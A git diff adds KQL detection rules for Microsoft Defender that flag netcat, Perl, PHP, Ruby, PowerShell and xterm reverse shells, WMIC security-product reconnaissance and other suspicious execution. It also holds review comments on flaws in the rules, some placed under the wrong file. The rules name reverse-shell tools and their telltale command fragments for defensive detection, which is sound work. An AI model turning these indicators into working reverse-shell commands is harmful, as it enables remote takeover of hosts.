+| where (FolderPath contains "3pm." or FolderPath contains "4pm." or FolderPath contains "cod." or FolderPath contains "fdp." or FolderPath contains "ftr." or FolderPath contains "gepj." or FolderPath contains "gnp." or FolderPath contains "gpj." or FolderPath contains "ism." or FolderPath contains "lmth." or FolderPath contains "nls." or FolderPath contains "piz." or FolderPath contains "slx." or FolderPath contains "tdo." or FolderPath contains "vsc." or FolderPath contains "vwm." or FolderPath contains "xcod." or FolderPath contains "xslx." or FolderPath contains "xtpp.") and (FolderPath contains "\\u202e" or FolderPath contains "[U+202E]")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
new file mode 100644
index 00000000..42d7fd78
--- /dev/null
+++ b/KQL/rules/Execution/potential_netcat_reverse_shell_execution.kql
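Review bot: `FolderPath contains "\\u202e"` on the last line is a KQL string holding the six characters `\u202e` (the backslash is escaped), not the U+202E right-to-left override itself, so together with the `[U+202E]` literal the rule only matches when the telemetry writes the character in an escaped form; if MDE puts the raw code point into `FolderPath` (which I would expect, but have not verified) neither alternative matches and the rule is dead. Comparing against the real character is the safer primary test: `FolderPath contains unicode_codepoints_to_string(0x202E)`, keeping the two escaped spellings as additional `or` branches. Confirm with a test file on a monitored host how the column renders the character before relying on either form.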
@@ -0,0 +1,12 @@
+// Title: Potential Netcat Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of netcat with the "-e" flag followed by common shells. This could be a sign of a potential reverse shell setup.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -e ") and (FolderPath endswith "/nc" or FolderPath endswith "/ncat") and (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh" or ProcessCommandLine contains "/bin/ash" or ProcessCommandLine contains "/bin/bash" or ProcessCommandLine contains "/bin/bsh" or ProcessCommandLine contains "/bin/csh" or ProcessCommandLine contains "/bin/ksh" or ProcessCommandLine contains "/bin/pdksh" or ProcessCommandLine contains "/bin/sh" or ProcessCommandLine contains "/bin/tcsh" or ProcessCommandLine contains "/bin/zsh" or ProcessCommandLine contains "$IFSash" or ProcessCommandLine contains "$IFSbash" or ProcessCommandLine contains "$IFSbsh" or ProcessCommandLine contains "$IFScsh" or ProcessCommandLine contains "$IFSksh" or ProcessCommandLine contains "$IFSpdksh" or ProcessCommandLine contains "$IFSsh" or ProcessCommandLine contains "$IFStcsh" or ProcessCommandLine contains "$IFSzsh")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql
new file mode 100644
index 00000000..33cca89b
--- /dev/null
+++ b/KQL/rules/Execution/potential_perl_reverse_shell_execution.kql
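Review bot: `FolderPath endswith "/nc" or FolderPath endswith "/ncat"` on the last line misses the binary names several distributions actually install (`/bin/nc.traditional`, `/bin/nc.openbsd`, `/usr/bin/netcat`); if the sensor reports the resolved target of the `nc` alternatives symlink rather than the invoked name — I have not verified which it does — those executions never match. Adding `FolderPath endswith "/nc.traditional" or FolderPath endswith "/nc.openbsd" or FolderPath endswith "/netcat"` to that group closes the gap cheaply. The shell list's `contains " sh"` also matches any later argument beginning with `sh` (e.g. `-c show`), but since it is ANDed with the netcat path and the `-c`/`-e` flag this is a minor FP source rather than a defect.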
@@ -0,0 +1,12 @@
+// Title: Potential Perl Reverse Shell Execution
+// Author: @d4ns4n_, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-04-07
+// Level: high
+// Description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
+// MITRE Tactic: Execution
+// Tags: attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "fdopen(" and ProcessCommandLine contains "::Socket::INET") or (ProcessCommandLine contains "Socket" and ProcessCommandLine contains "connect" and ProcessCommandLine contains "open" and ProcessCommandLine contains "exec")) and (ProcessCommandLine contains " -e " and FolderPath endswith "/perl")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
new file mode 100644
index 00000000..809a89fa
--- /dev/null
+++ b/KQL/rules/Execution/potential_persistence_via_vmwaretoolboxcmd_exe_vm_state_change_script.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-14
+// Level: medium
+// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.persistence, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql
new file mode 100644
index 00000000..db9e6038
--- /dev/null
+++ b/KQL/rules/Execution/potential_php_reverse_shell.kql
@@ -0,0 +1,12 @@
+// Title: Potential PHP Reverse Shell
+// Author: @d4ns4n_
+// Date: 2023-04-07
+// Level: high
+// Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets.
+Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection.
+
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ash" or ProcessCommandLine contains "bash" or ProcessCommandLine contains "bsh" or ProcessCommandLine contains "csh" or ProcessCommandLine contains "ksh" or ProcessCommandLine contains "pdksh" or ProcessCommandLine contains "sh" or ProcessCommandLine contains "tcsh" or ProcessCommandLine contains "zsh") and (ProcessCommandLine contains " -r " and ProcessCommandLine contains "fsockopen") and FolderPath contains "/php"
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql
new file mode 100644
index 00000000..4526a676
--- /dev/null
+++ b/KQL/rules/Execution/potential_powershell_command_line_obfuscation.kql
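Review bot: `ProcessCommandLine contains "sh"` in the first group of the PHP reverse-shell `| where` line matches any command line containing those two letters (`push`, `flush`, `ssh`, and every other shell name in the same list), so the shell group is effectively always true and the real selection is just `-r` plus `fsockopen`; either drop the group or anchor it, e.g. `ProcessCommandLine matches regex @"(^|[\s/'\"])(ash|bash|bsh|csh|ksh|pdksh|sh|tcsh|zsh)(\s|$|['\"])"`. `FolderPath contains "/php"` likewise matches unrelated paths such as `/phpmyadmin/` or a `php-fpm` binary; `FolderPath matches regex @"/php[0-9.]*$"` keeps the CLI binary and versioned names like `php8.2` while excluding those. The hunk has no `// False Positives:` section; legitimate `php -r` one-liners that open sockets (health checks, deploy scripts) are the obvious entry.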
@@ -0,0 +1,13 @@
+// Title: Potential PowerShell Command Line Obfuscation
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)
+// Date: 2020-10-15
+// Level: high
+// Description: Detects the PowerShell command lines with special characters
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1027, attack.t1059.001
+// False Positives:
+// - Amazon SSM Document Worker
+// - Windows Defender ATP
+
+DeviceProcessEvents
+| where (((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine matches regex "\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+" or ProcessCommandLine matches regex "\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{" or ProcessCommandLine matches regex "\\^.*\\^.*\\^.*\\^.*\\^" or ProcessCommandLine matches regex "`.*`.*`.*`.*`")) and (not((InitiatingProcessFolderPath =~ "C:\\Program Files\\Amazon\\SSM\\ssm-document-worker.exe" or (ProcessCommandLine contains "new EventSource(\"Microsoft.Windows.Sense.Client.Management\"" or ProcessCommandLine contains "public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);"))))
\ No newline at end of file
diff --git a/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql
new file mode 100644
index 00000000..072d65ce
--- /dev/null
+++ b/KQL/rules/Execution/potential_powershell_obfuscation_via_wchar_char.kql
@@ -0,0 +1,10 @@ +// Title: Potential PowerShell Obfuscation Via WCHAR/CHAR +// Author: Florian Roth (Nextron Systems) +// Date: 2020-07-09 +// Level: high +// Description: Detects suspicious encoded character syntax often used for defense evasion +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ProcessCommandLine contains "[char]0x" or ProcessCommandLine contains "(WCHAR)0x" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql new file mode 100644 index 00000000..59b853a3 --- /dev/null +++ b/KQL/rules/Execution/potential_powershell_reverseshell_connection.kql @@ -0,0 +1,12 @@ +// Title: Potential Powershell ReverseShell Connection +// Author: FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects usage of the "TcpClient" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang "Invoke-PowerShellTcpOneLine" reverse shell and other. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - In rare administrative cases, this function might be used to check network connectivity + +DeviceProcessEvents +| where (ProcessCommandLine contains " Net.Sockets.TCPClient" and ProcessCommandLine contains ".GetStream(" and ProcessCommandLine contains ".Write(") and ((ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..cecef711 --- /dev/null 
+++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,15 @@ +// Title: Potential Product Class Reconnaissance Via Wmic.EXE +// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community, Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. +Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. +This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.discovery, attack.t1082 +// False Positives: +// - Legitimate use of wmic.exe for reconnaissance of firewall, antivirus and antispywware products. + +DeviceProcessEvents +| where (ProcessCommandLine contains "AntiVirusProduct" or ProcessCommandLine contains "AntiSpywareProduct" or ProcessCommandLine contains "FirewallProduct") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..6d63984f --- /dev/null +++ b/KQL/rules/Execution/potential_product_reconnaissance_via_wmic_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Potential Product Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali +// Date: 2023-02-14 +// Level: medium +// Description: Detects the execution of WMIC in order to get a list of firewall and antivirus products +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains "Product" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains " uninstall" or ProcessCommandLine contains " install"))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql new file mode 100644 index 00000000..afa346a8 --- /dev/null +++ b/KQL/rules/Execution/potential_rdp_session_hijacking_activity.kql @@ -0,0 +1,12 @@ +// Title: Potential RDP Session Hijacking Activity +// Author: @juju4 +// Date: 2022-12-27 +// Level: medium +// Description: Detects potential RDP Session Hijacking activity on Windows systems +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Administrative activity + +DeviceProcessEvents +| where (FolderPath endswith "\\tscon.exe" or ProcessVersionInfoOriginalFileName =~ "tscon.exe") and (ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql new file mode 100644 index 00000000..050501fc --- /dev/null +++ b/KQL/rules/Execution/potential_reflectdebugger_content_execution_via_werfault_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Potential ReflectDebugger Content Execution Via WerFault.EXE +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-30 +// Level: medium +// Description: Detects execution of "WerFault.exe" with the "-pr" commandline flag that is used to run files stored in the ReflectDebugger key which could be used to store the path to the malware in order to masquerade the execution flow +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where ProcessCommandLine contains " -pr " and (FolderPath endswith "\\WerFault.exe" or ProcessVersionInfoOriginalFileName =~ "WerFault.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_renamed_rundll32_execution.kql b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql new file mode 100644 index 00000000..15309365 --- /dev/null +++ b/KQL/rules/Execution/potential_renamed_rundll32_execution.kql @@ -0,0 +1,12 @@ +// Title: Potential Renamed Rundll32 Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: high +// Description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "DllRegisterServer" and (not(FolderPath endswith "\\rundll32.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_ruby_reverse_shell.kql b/KQL/rules/Execution/potential_ruby_reverse_shell.kql new file mode 100644 index 00000000..1d9b0d62 --- /dev/null +++ b/KQL/rules/Execution/potential_ruby_reverse_shell.kql 
@@ -0,0 +1,10 @@ +// Title: Potential Ruby Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-07 +// Level: medium +// Description: Detects execution of ruby with the "-e" flag and calls to "socket" related functions. This could be an indication of a potential attempt to setup a reverse shell +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents +| where (ProcessCommandLine contains " ash" or ProcessCommandLine contains " bash" or ProcessCommandLine contains " bsh" or ProcessCommandLine contains " csh" or ProcessCommandLine contains " ksh" or ProcessCommandLine contains " pdksh" or ProcessCommandLine contains " sh" or ProcessCommandLine contains " tcsh") and (ProcessCommandLine contains " -e" and ProcessCommandLine contains "rsocket" and ProcessCommandLine contains "TCPSocket") and FolderPath contains "ruby" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql new file mode 100644 index 00000000..b303daba --- /dev/null +++ b/KQL/rules/Execution/potential_shelldispatch_dll_functionality_abuse.kql @@ -0,0 +1,12 @@ +// Title: Potential ShellDispatch.DLL Functionality Abuse +// Author: X__Junior (Nextron Systems) +// Date: 2023-06-20 +// Level: medium +// Description: Detects potential "ShellDispatch.dll" functionality abuse to execute arbitrary binaries via "ShellExecute" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "RunDll_ShellExecuteW" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file 
diff --git a/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql new file mode 100644 index 00000000..c95fcd22 --- /dev/null +++ b/KQL/rules/Execution/potential_suspicious_browser_launch_from_document_reader_process.kql @@ -0,0 +1,13 @@ +// Title: Potential Suspicious Browser Launch From Document Reader Process +// Author: Joseph Kamau +// Date: 2024-05-27 +// Level: medium +// Description: Detects when a browser process or browser tab is launched from an application that handles document files such as Adobe, Microsoft Office, etc. And connects to a web application over http(s), this could indicate a possible phishing attempt. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - Unlikely in most cases, further investigation should be done in the commandline of the browser process to determine the context of the URL accessed. + +DeviceProcessEvents +| where (ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\firefox.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\maxthon.exe" or FolderPath endswith "\\seamonkey.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath contains "Acrobat Reader" or InitiatingProcessFolderPath contains "Microsoft Office" or InitiatingProcessFolderPath contains "PDF Reader")) and (not(ProcessCommandLine contains "https://go.microsoft.com/fwlink/")) and (not(((ProcessCommandLine contains "http://ad.foxitsoftware.com/adlog.php") or (ProcessCommandLine contains "https://globe-map.foxitservice.com/go.php" and ProcessCommandLine contains "do=redirect")))) \ No newline at end of file 
diff --git a/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql new file mode 100644 index 00000000..e960299f --- /dev/null +++ b/KQL/rules/Execution/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql @@ -0,0 +1,10 @@ +// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-20 +// Level: medium +// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047 + +DeviceProcessEvents +| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql new file mode 100644 index 00000000..a7e6cfb4 --- /dev/null +++ b/KQL/rules/Execution/potential_winapi_calls_via_commandline.kql 
@@ -0,0 +1,12 @@ +// Title: Potential WinAPI Calls Via CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-06 +// Level: high +// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1106 +// False Positives: +// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity. + +DeviceProcessEvents +| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine 
contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql new file mode 100644 index 00000000..6af3f015 --- /dev/null +++ b/KQL/rules/Execution/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql 
@@ -0,0 +1,14 @@ +// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell +// Author: Markus Neis @Karneades +// Date: 2019-04-03 +// Level: medium +// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, attack.t1059.001 +// False Positives: +// - AppvClient +// - CCM +// - WinRM + +DeviceProcessEvents +| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potential_xterm_reverse_shell.kql b/KQL/rules/Execution/potential_xterm_reverse_shell.kql new file mode 100644 index 00000000..1c1b667c --- /dev/null +++ b/KQL/rules/Execution/potential_xterm_reverse_shell.kql @@ -0,0 +1,10 @@ +// Title: Potential Xterm Reverse Shell +// Author: @d4ns4n_ +// Date: 2023-04-24 +// Level: medium +// Description: Detects usage of "xterm" as a potential reverse shell tunnel +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059 + +DeviceProcessEvents +| where ProcessCommandLine contains "-display" and ProcessCommandLine endswith ":1" and FolderPath contains "xterm" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql new file mode 100644 index 00000000..4ccb7247 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_clickonce_application.kql 
@@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Child Process Of ClickOnce Application +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects potentially suspicious child processes of a ClickOnce deployment application +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents +| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql new file mode 100644 index 00000000..f4afef5e --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_vscode.kql 
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Child Process Of VsCode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-26 +// Level: medium +// Description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 +// False Positives: +// - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\code.exe" and (((ProcessCommandLine contains "Invoke-Expressions" or ProcessCommandLine contains "IEX" or ProcessCommandLine contains "Invoke-Command" or ProcessCommandLine contains "ICM" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe")) or (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains ":\\Users\\Public\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Temp\\")) \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql new file mode 100644 index 00000000..816df51d --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_child_process_of_winrar_exe.kql 
@@ -0,0 +1,10 @@ +// Title: Potentially Suspicious Child Process Of WinRAR.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-31 +// Level: medium +// Description: Detects potentially suspicious child processes of WinRAR.exe. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\WinRAR.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql new file mode 100644 index 00000000..29371d73 --- /dev/null +++ b/KQL/rules/Execution/potentially_suspicious_command_executed_via_run_dialog_box_registry.kql 
@@ -0,0 +1,12 @@ +// Title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: high +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. + +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 + +DeviceRegistryEvents +| where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (((RegistryValueData contains "powershell" or RegistryValueData contains "pwsh") and (RegistryValueData contains " -e " or RegistryValueData contains " -ec " or RegistryValueData contains " -en " or RegistryValueData contains " -enc " or RegistryValueData contains " -enco" or RegistryValueData contains "ftp" or RegistryValueData contains "Hidden" or RegistryValueData contains "http" or RegistryValueData contains "iex" or RegistryValueData contains "Invoke-")) or (RegistryValueData contains "wmic" and (RegistryValueData contains "shadowcopy" or RegistryValueData contains "process call create"))) \ No newline at end of file diff --git 